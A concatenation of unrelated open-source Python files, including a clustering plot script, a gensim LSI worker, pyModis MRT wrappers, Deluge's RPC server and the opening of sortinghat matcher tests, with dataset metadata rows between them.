current_app.logger.debug(f'User has already accepted ToU version {version!r}')
return None
if not current_app.actions_db:
current_app.logger.warning('No actions_db - aborting ToU action')
return None
if current_app.actions_db.has_actions(user.eppn, action_type='tou', params={'version': version}):
return None
current_app.logger.debug(f'User must accept ToU version {version!r}')
return current_app.actions_db.add_action(user.eppn, action_type='tou', preference=100, params={'version': version})
| bsd-3-clause | 7,871,357,113,988,800,000 | 41.742857 | 119 | 0.739973 | false |
robin-lai/DensityPeakCluster | plot.py | 1 | 1965 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import numpy as np
from cluster import *
from sklearn import manifold
from plot_utils import *
def plot_rho_delta(rho, delta):
'''
Plot scatter diagram for rho-delta points
Args:
rho : rho list
delta : delta list
'''
logger.info("PLOT: rho-delta plot")
plot_scatter_diagram(0, rho[1:], delta[1:], x_label='rho', y_label='delta', title='rho-delta')
def plot_cluster(cluster):
'''
Plot scatter diagram for final points that using multi-dimensional scaling for data
Args:
cluster : DensityPeakCluster object
'''
logger.info("PLOT: cluster result, start multi-dimensional scaling")
dp = np.zeros((cluster.max_id, cluster.max_id), dtype = np.float32)
cls = []
for i in xrange(1, cluster.max_id):
for j in xrange(i + 1, cluster.max_id + 1):
dp[i - 1, j - 1] = cluster.distances[(i, j)]
dp[j - 1, i - 1] = cluster.distances[(i, j)]
cls.append(cluster.cluster[i])
cls.append(cluster.cluster[cluster.max_id])
cls = np.array(cls, dtype = np.float32)
fo = open(r'./tmp.txt', 'w')
fo.write('\n'.join(map(str, cls)))
fo.close()
seed = np.random.RandomState(seed=3)
mds = manifold.MDS(max_iter=200, eps=1e-4, n_init=1)
dp_mds = mds.fit_transform(dp)
logger.info("PLOT: end mds, start plot")
plot_scatter_diagram(1, dp_mds[:, 0], dp_mds[:, 1], title='cluster', style_list = cls)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
dpcluster = DensityPeakCluster()
# dpcluster.local_density(load_paperdata, './example_distances.dat')
# plot_rho_delta(rho, delta) #plot to choose the threthold
rho, delta, nneigh = dpcluster.cluster(load_paperdata, './data/data_in_paper/example_distances.dat', 20, 0.1)
logger.info(str(len(dpcluster.ccenter)) + ' center as below')
for idx, center in dpcluster.ccenter.items():
logger.info('%d %f %f' %(idx, rho[center], delta[center]))
plot_cluster(dpcluster) | mit | -2,970,879,158,770,166,000 | 34.107143 | 110 | 0.679389 | false |
samantp/gensimPy3 | gensim/models/lsi_worker.py | 1 | 3221 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s
Worker ("slave") process used in computing distributed LSI. Run this script \
on every node in your cluster. If you wish, you may even run it multiple times \
on a single machine, to make better use of multiple cores (just beware that \
memory footprint increases accordingly).
Example: python -m gensim.models.lsi_worker
"""
import os, sys, logging
import threading
import tempfile
from gensim.models import lsimodel
from gensim import utils
logger = logging.getLogger('gensim.models.lsi_worker')
SAVE_DEBUG = 0 # save intermediate models after every SAVE_DEBUG updates (0 for never)
class Worker(object):
def __init__(self):
self.model = None
def initialize(self, myid, dispatcher, **model_params):
self.lock_update = threading.Lock()
self.jobsdone = 0 # how many jobs has this worker completed?
self.myid = myid # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?
self.dispatcher = dispatcher
logger.info("initializing worker #%s" % myid)
self.model = lsimodel.LsiModel(**model_params)
def requestjob(self):
"""
Request jobs from the dispatcher in an infinite loop. The requests are
blocking, so if there are no jobs available, the thread will wait.
"""
if self.model is None:
raise RuntimeError("worker must be initialized before receiving jobs")
job = self.dispatcher.getjob(self.myid) # blocks until a new job is available from the dispatcher
logger.info("worker #%s received job #%i" % (self.myid, self.jobsdone))
self.processjob(job)
self.dispatcher.jobdone(self.myid)
@utils.synchronous('lock_update')
def processjob(self, job):
self.model.add_documents(job)
self.jobsdone += 1
if SAVE_DEBUG and self.jobsdone % SAVE_DEBUG == 0:
fname = os.path.join(tempfile.gettempdir(), 'lsi_worker.pkl')
self.model.save(fname)
@utils.synchronous('lock_update')
def getstate(self):
logger.info("worker #%i returning its state after %s jobs" %
(self.myid, self.jobsdone))
assert isinstance(self.model.projection, lsimodel.Projection)
result = self.model.projection
self.model.projection = self.model.projection.empty_like()
return result
def exit(self):
logger.info("terminating worker #%i" % self.myid)
os._exit(0)
#endclass Worker
def main():
logging.basicConfig(format = '%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logger.info("running %s" % " ".join(sys.argv))
program = os.path.basename(sys.argv[0])
# make sure we have enough cmd line parameters
if len(sys.argv) < 1:
print(globals()["__doc__"] % locals())
sys.exit(1)
utils.pyro_daemon('gensim.lsi_worker', Worker(), random_suffix=True)
logger.info("finished running %s" % program)
if __name__ == '__main__':
main()
| gpl-3.0 | -6,709,509,564,474,837,000 | 29.971154 | 123 | 0.656007 | false |
gilliM/MFQ | ModisFromQgis/mypymodis/convertmodis.py | 1 | 9852 | #!/usr/bin/env python
# class to convert/process modis data
#
# (c) Copyright Luca Delucchi 2010
# Authors: Luca Delucchi
# Email: luca dot delucchi at iasma dot it
#
##################################################################
#
# This MODIS Python class is licensed under the terms of GNU GPL 2.
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
##################################################################
"""Convert MODIS HDF file to GeoTiff file or create a HDF mosaic file for
several tiles using Modis Reprojection Tools.
Classes:
* :class:`convertModis`
* :class:`createMosaic`
* :class:`processModis`
Functions:
* :func:`checkMRTpath`
"""
# to be compliant with python 3
from __future__ import print_function
import os
import sys
def checkMRTpath(mrtpath):
"""Function to check if MRT path it correct
:param str mrtpath: the path to MRT directory
:return: The path to 'bin' and 'data' directory inside MRT path
"""
if os.path.exists(mrtpath):
if os.path.exists(os.path.join(mrtpath, 'bin')):
mrtpathbin = os.path.join(mrtpath, 'bin')
os.environ['PATH'] = "{path}:{data}".format(path=os.environ['PATH'],
data=os.path.join(mrtpath, 'data'))
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'bin')))
if os.path.exists(os.path.join(mrtpath, 'data')):
mrtpathdata = os.path.join(mrtpath, 'data')
os.environ['MRTDATADIR'] = os.path.join(mrtpath, 'data')
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'data')))
else:
raise IOError('The path {name} does not exist'.format(name=mrtpath))
return mrtpathbin, mrtpathdata
class convertModis:
"""A class to convert modis data from hdf to tif using resample
(from MRT tools)
:param str hdfname: the full path to the hdf file
:param str confile: the full path to the paramater file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Initialization function"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('{name} does not exist'.format(name=hdfname))
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('{name} does not exist'.format(name=confile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample')):
return os.path.join(self.mrtpathbin, 'resample')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample.exe')):
return os.path.join(self.mrtpathbin, 'resample.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist: it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-p', self.conf])
return "The hdf file {name} was converted successfully".format(name=self.name)
class createMosaic:
"""A class to convert several MODIS tiles into a mosaic
:param str listfile: the path to file with the list of HDF MODIS
file
:param str outprefix: the prefix for output files
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
:param str subset: a string composed by 1 and 0 according with the
layer to mosaic. The string should something like
'1 0 1 0 0 0 0'
"""
def __init__(self, listfile, outprefix, mrtpath, subset=False):
"""Function to initialize the object"""
import tempfile
# check if the hdf file exists
if os.path.exists(listfile):
self.basepath = os.path.split(listfile)[0]
self.fullpath = os.path.realpath(self.basepath)
self.listfiles = listfile
self.tmplistfiles = open(os.path.join(tempfile.gettempdir(),
'{name}.prm'.format(name=str(os.getpid()))), 'w')
self.HDFfiles = open(listfile).readlines()
else:
raise IOError('{name} not exists'.format(name=listfile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
self.out = os.path.join(self.basepath, outprefix + '.hdf')
self.outxml = self.out + '.xml'
self.subset = subset
def write_mosaic_xml(self):
"""Write the XML metadata file for MODIS mosaic"""
from parsemodis import parseModisMulti
listHDF = []
for i in self.HDFfiles:
if i.find(self.basepath) == -1 and i.find('.hdf.xml') == -1:
print("Attention: maybe you do not have the full path in the"
" HDF file list")
listHDF.append(os.path.join(self.basepath, i.strip()))
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.basepath, i.strip())))
elif i.find('.hdf.xml') == -1:
listHDF.append(i.strip())
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.fullpath, i.strip())))
pmm = parseModisMulti(listHDF)
pmm.writexml(self.outxml)
self.tmplistfiles.close()
def executable(self):
"""Return the executable of mrtmosaic MRT software"""
if sys.platform.count('linux'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic')):
return os.path.join(self.mrtpathbin, 'mrtmosaic')
elif sys.platform.count('win32'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic.exe')):
return os.path.join(self.mrtpathbin, 'mrtmosaic.exe')
def run(self):
"""Exect the mosaic process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
self.write_mosaic_xml()
if self.subset:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out, '-s', self.subset],
stderr=subprocess.STDOUT)
else:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out], stderr=subprocess.STDOUT)
return "The mosaic file {name} has been created".format(name=self.out)
class processModis:
"""A class to process raw modis data from hdf to tif using swath2grid
(from MRT Swath tools)
:param str hdfname: the full path to the hdf file
:param str confile: the full path to the paramater file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Function to initialize the object"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('%s does not exist' % hdfname)
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('%s does not exist' % confile)
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid')):
return os.path.join(self.mrtpathbin, 'swath2grid')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid.exe')):
return os.path.join(self.mrtpathbin, 'swath2grid.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-pf={name}'.format(name=self.conf)])
return "The hdf file {name} has been converted".format(name=self.name)
| gpl-2.0 | 3,430,796,322,326,660,000 | 41.649351 | 103 | 0.593991 | false |
ratoaq2/deluge | deluge/core/rpcserver.py | 1 | 21636 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008,2009 Andrew Resch <[email protected]>
#
# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with
# the additional special exception to link portions of this program with the OpenSSL library.
# See LICENSE for more details.
#
"""RPCServer Module"""
from __future__ import unicode_literals
import logging
import os
import stat
import sys
import traceback
from collections import namedtuple
from types import FunctionType
from OpenSSL import SSL, crypto
from twisted.internet import defer, reactor
from twisted.internet.protocol import Factory, connectionDone
import deluge.component as component
import deluge.configmanager
from deluge.core.authmanager import AUTH_LEVEL_ADMIN, AUTH_LEVEL_DEFAULT, AUTH_LEVEL_NONE
from deluge.error import DelugeError, IncompatibleClient, NotAuthorizedError, WrappedException, _ClientSideRecreateError
from deluge.event import ClientDisconnectedEvent
from deluge.transfer import DelugeTransferProtocol
RPC_RESPONSE = 1
RPC_ERROR = 2
RPC_EVENT = 3
log = logging.getLogger(__name__)
def export(auth_level=AUTH_LEVEL_DEFAULT):
"""
Decorator function to register an object's method as an RPC. The object
will need to be registered with an :class:`RPCServer` to be effective.
:param func: the function to export
:type func: function
:param auth_level: the auth level required to call this method
:type auth_level: int
"""
def wrap(func, *args, **kwargs):
func._rpcserver_export = True
func._rpcserver_auth_level = auth_level
doc = func.__doc__
func.__doc__ = '**RPC Exported Function** (*Auth Level: %s*)\n\n' % auth_level
if doc:
func.__doc__ += doc
return func
if isinstance(auth_level, FunctionType):
func = auth_level
auth_level = AUTH_LEVEL_DEFAULT
return wrap(func)
else:
return wrap
def format_request(call):
"""
Format the RPCRequest message for debug printing
:param call: the request
:type call: a RPCRequest
:returns: a formatted string for printing
:rtype: str
"""
try:
s = call[1] + '('
if call[2]:
s += ', '.join([str(x) for x in call[2]])
if call[3]:
if call[2]:
s += ', '
s += ', '.join([key + '=' + str(value) for key, value in call[3].items()])
s += ')'
except UnicodeEncodeError:
return 'UnicodeEncodeError, call: %s' % call
else:
return s
class ServerContextFactory(object):
def getContext(self): # NOQA: N802
"""
Create an SSL context.
This loads the servers cert/private key SSL files for use with the
SSL transport.
"""
ssl_dir = deluge.configmanager.get_config_dir('ssl')
ctx = SSL.Context(SSL.SSLv23_METHOD)
ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3)
ctx.use_certificate_file(os.path.join(ssl_dir, 'daemon.cert'))
ctx.use_privatekey_file(os.path.join(ssl_dir, 'daemon.pkey'))
return ctx
class DelugeRPCProtocol(DelugeTransferProtocol):
def __init__(self):
super(DelugeRPCProtocol, self).__init__()
# namedtuple subclass with auth_level, username for the connected session.
self.AuthLevel = namedtuple('SessionAuthlevel', 'auth_level, username')
def message_received(self, request):
"""
This method is called whenever a message is received from a client. The
only message that a client sends to the server is a RPC Request message.
If the RPC Request message is valid, then the method is called in
:meth:`dispatch`.
:param request: the request from the client.
:type data: tuple
"""
if not isinstance(request, tuple):
log.debug('Received invalid message: type is not tuple')
return
if len(request) < 1:
log.debug('Received invalid message: there are no items')
return
for call in request:
if len(call) != 4:
log.debug('Received invalid rpc request: number of items '
'in request is %s', len(call))
continue
# log.debug('RPCRequest: %s', format_request(call))
reactor.callLater(0, self.dispatch, *call)
def sendData(self, data): # NOQA: N802
"""
Sends the data to the client.
:param data: the object that is to be sent to the client. This should
be one of the RPC message types.
:type data: object
"""
try:
self.transfer_message(data)
except Exception as ex:
log.warn('Error occurred when sending message: %s.', ex)
log.exception(ex)
raise
def connectionMade(self): # NOQA: N802
"""
This method is called when a new client connects.
"""
peer = self.transport.getPeer()
log.info('Deluge Client connection made from: %s:%s',
peer.host, peer.port)
# Set the initial auth level of this session to AUTH_LEVEL_NONE
self.factory.authorized_sessions[
self.transport.sessionno] = self.AuthLevel(AUTH_LEVEL_NONE, '')
def connectionLost(self, reason=connectionDone): # NOQA: N802
"""
This method is called when the client is disconnected.
:param reason: the reason the client disconnected.
:type reason: str
"""
# We need to remove this session from various dicts
del self.factory.authorized_sessions[self.transport.sessionno]
if self.transport.sessionno in self.factory.session_protocols:
del self.factory.session_protocols[self.transport.sessionno]
if self.transport.sessionno in self.factory.interested_events:
del self.factory.interested_events[self.transport.sessionno]
if self.factory.state == 'running':
component.get('EventManager').emit(ClientDisconnectedEvent(self.factory.session_id))
log.info('Deluge client disconnected: %s', reason.value)
def valid_session(self):
return self.transport.sessionno in self.factory.authorized_sessions
def dispatch(self, request_id, method, args, kwargs):
"""
This method is run when a RPC Request is made. It will run the local method
and will send either a RPC Response or RPC Error back to the client.
:param request_id: the request_id from the client (sent in the RPC Request)
:type request_id: int
:param method: the local method to call. It must be registered with
the :class:`RPCServer`.
:type method: str
:param args: the arguments to pass to `method`
:type args: list
:param kwargs: the keyword-arguments to pass to `method`
:type kwargs: dict
"""
def send_error():
"""
Sends an error response with the contents of the exception that was raised.
"""
exceptionType, exceptionValue, dummy_exceptionTraceback = sys.exc_info()
formated_tb = traceback.format_exc()
try:
self.sendData((
RPC_ERROR,
request_id,
exceptionType.__name__,
exceptionValue._args,
exceptionValue._kwargs,
formated_tb
))
except AttributeError:
# This is not a deluge exception (object has no attribute '_args), let's wrap it
log.warning('An exception occurred while sending RPC_ERROR to '
'client. Wrapping it and resending. Error to '
'send(causing exception goes next):\n%s', formated_tb)
try:
raise WrappedException(str(exceptionValue), exceptionType.__name__, formated_tb)
except WrappedException:
send_error()
except Exception as ex:
log.error('An exception occurred while sending RPC_ERROR to client: %s', ex)
if method == 'daemon.info':
# This is a special case and used in the initial connection process
self.sendData((RPC_RESPONSE, request_id, deluge.common.get_version()))
return
elif method == 'daemon.login':
# This is a special case and used in the initial connection process
# We need to authenticate the user here
log.debug('RPC dispatch daemon.login')
try:
client_version = kwargs.pop('client_version', None)
if client_version is None:
raise IncompatibleClient(deluge.common.get_version())
ret = component.get('AuthManager').authorize(*args, **kwargs)
if ret:
self.factory.authorized_sessions[
self.transport.sessionno] = self.AuthLevel(ret, args[0])
self.factory.session_protocols[self.transport.sessionno] = self
except Exception as ex:
send_error()
if not isinstance(ex, _ClientSideRecreateError):
log.exception(ex)
else:
self.sendData((RPC_RESPONSE, request_id, (ret)))
if not ret:
self.transport.loseConnection()
return
# Anything below requires a valid session
if not self.valid_session():
return
if method == 'daemon.set_event_interest':
log.debug('RPC dispatch daemon.set_event_interest')
# This special case is to allow clients to set which events they are
# interested in receiving.
# We are expecting a sequence from the client.
try:
if self.transport.sessionno not in self.factory.interested_events:
self.factory.interested_events[self.transport.sessionno] = []
self.factory.interested_events[self.transport.sessionno].extend(args[0])
except Exception:
send_error()
else:
self.sendData((RPC_RESPONSE, request_id, (True)))
return
if method not in self.factory.methods:
try:
# Raise exception to be sent back to client
raise AttributeError('RPC call on invalid function: %s' % method)
except AttributeError:
send_error()
return
log.debug('RPC dispatch %s', method)
try:
method_auth_requirement = self.factory.methods[method]._rpcserver_auth_level
auth_level = self.factory.authorized_sessions[self.transport.sessionno].auth_level
if auth_level < method_auth_requirement:
# This session is not allowed to call this method
log.debug('Session %s is attempting an unauthorized method call!',
self.transport.sessionno)
raise NotAuthorizedError(auth_level, method_auth_requirement)
# Set the session_id in the factory so that methods can know
# which session is calling it.
self.factory.session_id = self.transport.sessionno
ret = self.factory.methods[method](*args, **kwargs)
except Exception as ex:
send_error()
# Don't bother printing out DelugeErrors, because they are just
# for the client
if not isinstance(ex, DelugeError):
log.exception('Exception calling RPC request: %s', ex)
else:
# Check if the return value is a deferred, since we'll need to
# wait for it to fire before sending the RPC_RESPONSE
if isinstance(ret, defer.Deferred):
def on_success(result):
try:
self.sendData((RPC_RESPONSE, request_id, result))
except Exception:
send_error()
return result
def on_fail(failure):
try:
failure.raiseException()
except Exception:
send_error()
return failure
ret.addCallbacks(on_success, on_fail)
else:
self.sendData((RPC_RESPONSE, request_id, ret))
class RPCServer(component.Component):
"""
This class is used to handle rpc requests from the client. Objects are
registered with this class and their methods are exported using the export
decorator.
:param port: the port the RPCServer will listen on
:type port: int
:param interface: the interface to listen on, this may override the `allow_remote` setting
:type interface: str
:param allow_remote: set True if the server should allow remote connections
:type allow_remote: bool
:param listen: if False, will not start listening.. This is only useful in Classic Mode
:type listen: bool
"""
def __init__(self, port=58846, interface='', allow_remote=False, listen=True):
component.Component.__init__(self, 'RPCServer')
self.factory = Factory()
self.factory.protocol = DelugeRPCProtocol
self.factory.session_id = -1
self.factory.state = 'running'
# Holds the registered methods
self.factory.methods = {}
# Holds the session_ids and auth levels
self.factory.authorized_sessions = {}
# Holds the protocol objects with the session_id as key
self.factory.session_protocols = {}
# Holds the interested event list for the sessions
self.factory.interested_events = {}
self.listen = listen
if not listen:
return
if allow_remote:
hostname = ''
else:
hostname = 'localhost'
if interface:
hostname = interface
log.info('Starting DelugeRPC server %s:%s', hostname, port)
# Check for SSL keys and generate some if needed
check_ssl_keys()
try:
reactor.listenSSL(port, self.factory, ServerContextFactory(), interface=hostname)
except Exception as ex:
log.debug('Daemon already running or port not available.: %s', ex)
raise
def register_object(self, obj, name=None):
"""
Registers an object to export it's rpc methods. These methods should
be exported with the export decorator prior to registering the object.
:param obj: the object that we want to export
:type obj: object
:param name: the name to use, if None, it will be the class name of the object
:type name: str
"""
if not name:
name = obj.__class__.__name__.lower()
for d in dir(obj):
if d[0] == '_':
continue
if getattr(getattr(obj, d), '_rpcserver_export', False):
log.debug('Registering method: %s', name + '.' + d)
self.factory.methods[name + '.' + d] = getattr(obj, d)
def deregister_object(self, obj):
"""
Deregisters an objects exported rpc methods.
:param obj: the object that was previously registered
"""
for key, value in self.factory.methods.items():
if value.__self__ == obj:
del self.factory.methods[key]
def get_object_method(self, name):
"""
Returns a registered method.
:param name: the name of the method, usually in the form of 'object.method'
:type name: str
:returns: method
:raises KeyError: if `name` is not registered
"""
return self.factory.methods[name]
def get_method_list(self):
"""
Returns a list of the exported methods.
:returns: the exported methods
:rtype: list
"""
return list(self.factory.methods)
def get_session_id(self):
"""
Returns the session id of the current RPC.
:returns: the session id, this will be -1 if no connections have been made
:rtype: int
"""
return self.factory.session_id
def get_session_user(self):
"""
Returns the username calling the current RPC.
:returns: the username of the user calling the current RPC
:rtype: string
"""
if not self.listen:
return 'localclient'
session_id = self.get_session_id()
if session_id > -1 and session_id in self.factory.authorized_sessions:
return self.factory.authorized_sessions[session_id].username
else:
# No connections made yet
return ''
def get_session_auth_level(self):
"""
Returns the auth level of the user calling the current RPC.
:returns: the auth level
:rtype: int
"""
if not self.listen or not self.is_session_valid(self.get_session_id()):
return AUTH_LEVEL_ADMIN
return self.factory.authorized_sessions[self.get_session_id()].auth_level
def get_rpc_auth_level(self, rpc):
"""
Returns the auth level requirement for an exported rpc.
:returns: the auth level
:rtype: int
"""
return self.factory.methods[rpc]._rpcserver_auth_level
def is_session_valid(self, session_id):
"""
Checks if the session is still valid, eg, if the client is still connected.
:param session_id: the session id
:type session_id: int
:returns: True if the session is valid
:rtype: bool
"""
return session_id in self.factory.authorized_sessions
def emit_event(self, event):
"""
Emits the event to interested clients.
:param event: the event to emit
:type event: :class:`deluge.event.DelugeEvent`
"""
log.debug('intevents: %s', self.factory.interested_events)
# Find sessions interested in this event
for session_id, interest in self.factory.interested_events.items():
if event.name in interest:
log.debug('Emit Event: %s %s', event.name, event.args)
# This session is interested so send a RPC_EVENT
self.factory.session_protocols[session_id].sendData(
(RPC_EVENT, event.name, event.args)
)
def emit_event_for_session_id(self, session_id, event):
"""
Emits the event to specified session_id.
:param session_id: the event to emit
:type session_id: int
:param event: the event to emit
:type event: :class:`deluge.event.DelugeEvent`
"""
if not self.is_session_valid(session_id):
log.debug('Session ID %s is not valid. Not sending event "%s".', session_id, event.name)
return
if session_id not in self.factory.interested_events:
log.debug('Session ID %s is not interested in any events. Not sending event "%s".',
session_id, event.name)
return
if event.name not in self.factory.interested_events[session_id]:
log.debug('Session ID %s is not interested in event "%s". Not sending it.', session_id, event.name)
return
log.debug('Sending event "%s" with args "%s" to session id "%s".',
event.name, event.args, session_id)
self.factory.session_protocols[session_id].sendData((RPC_EVENT, event.name, event.args))
def stop(self):
self.factory.state = 'stopping'
def check_ssl_keys():
"""
Check for SSL cert/key and create them if necessary
"""
ssl_dir = deluge.configmanager.get_config_dir('ssl')
if not os.path.exists(ssl_dir):
# The ssl folder doesn't exist so we need to create it
os.makedirs(ssl_dir)
generate_ssl_keys()
else:
for f in ('daemon.pkey', 'daemon.cert'):
if not os.path.exists(os.path.join(ssl_dir, f)):
generate_ssl_keys()
break
def generate_ssl_keys():
"""
This method generates a new SSL key/cert.
"""
from deluge.common import PY2
digest = 'sha256' if not PY2 else b'sha256'
# Generate key pair
pkey = crypto.PKey()
pkey.generate_key(crypto.TYPE_RSA, 2048)
# Generate cert request
req = crypto.X509Req()
subj = req.get_subject()
setattr(subj, 'CN', 'Deluge Daemon')
req.set_pubkey(pkey)
req.sign(pkey, digest)
# Generate certificate
cert = crypto.X509()
cert.set_serial_number(0)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(60 * 60 * 24 * 365 * 3) # Three Years
cert.set_issuer(req.get_subject())
cert.set_subject(req.get_subject())
cert.set_pubkey(req.get_pubkey())
cert.sign(pkey, digest)
# Write out files
ssl_dir = deluge.configmanager.get_config_dir('ssl')
with open(os.path.join(ssl_dir, 'daemon.pkey'), 'wb') as _file:
_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey))
with open(os.path.join(ssl_dir, 'daemon.cert'), 'wb') as _file:
_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
# Make the files only readable by this user
for f in ('daemon.pkey', 'daemon.cert'):
os.chmod(os.path.join(ssl_dir, f), stat.S_IREAD | stat.S_IWRITE)
| gpl-3.0 | -4,821,459,966,041,163,000 | 35.180602 | 120 | 0.594888 | false |
MetricsGrimoire/sortinghat | tests/test_matcher.py | 1 | 11000 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2017 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Santiago Dueñas <[email protected]>
#
import sys
import unittest
if '..' not in sys.path:
sys.path.insert(0, '..')
from sortinghat.db.model import UniqueIdentity, Identity, MatchingBlacklist
from sortinghat.exceptions import MatcherNotSupportedError
from sortinghat.matcher import IdentityMatcher, create_identity_matcher, match
from sortinghat.matching import EmailMatcher, EmailNameMatcher
class TestCreateIdentityMatcher(unittest.TestCase):
def test_identity_matcher_instance(self):
"""Test if the factory function returns an identity matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
matcher = create_identity_matcher('email')
self.assertIsInstance(matcher, EmailMatcher)
matcher = create_identity_matcher('email-name')
self.assertIsInstance(matcher, EmailNameMatcher)
def test_identity_matcher_instance_with_blacklist(self):
"""Test if the factory function adds a blacklist to the matcher instance"""
# The blacklist is empty
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 0)
# Create a matcher with a blacklist
blacklist = [MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
matcher = create_identity_matcher('default', blacklist=blacklist)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 5)
def test_identity_matcher_instance_with_sources_list(self):
"""Test if the factory function adds a sources list to the matcher instance"""
# The sources list is None
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.sources, None)
# Create a matcher with a sources list
sources = ['git', 'jira', 'github']
matcher = create_identity_matcher('default', sources=sources)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.sources), 3)
def test_identity_matcher_instance_with_strict(self):
"""Test if the factory function adds the strict mode to the matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, True)
matcher = create_identity_matcher('default', strict=False)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, False)
def test_not_supported_matcher(self):
"""Check if an exception is raised when the given matcher type is not supported"""
self.assertRaises(MatcherNotSupportedError,
create_identity_matcher, 'custom')
class TestIdentityMatcher(unittest.TestCase):
"""Test IdentityMatcher class"""
def test_blacklist(self):
"""Test blacklist contents"""
m = IdentityMatcher()
self.assertListEqual(m.blacklist, [])
m = IdentityMatcher(blacklist=[])
self.assertListEqual(m.blacklist, [])
blacklist = [MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
m = IdentityMatcher(blacklist=blacklist)
self.assertListEqual(m.blacklist, ['john smith', '[email protected]',
'[email protected]', '[email protected]',
'root'])
def test_sources_list(self):
"""Test sources list contents"""
m = IdentityMatcher()
self.assertEqual(m.sources, None)
m = IdentityMatcher(sourecs=[])
self.assertEqual(m.sources, None)
sources = ['git', 'Jira', 'GitHub']
m = IdentityMatcher(sources=sources)
self.assertListEqual(m.sources, ['git', 'github', 'jira'])
def test_strict_mode(self):
"""Test strict mode value"""
m = IdentityMatcher()
self.assertEqual(m.strict, True)
m = IdentityMatcher(strict=False)
self.assertEqual(m.strict, False)
class TestMatch(unittest.TestCase):
"""Test match function"""
def setUp(self):
# Add some unique identities
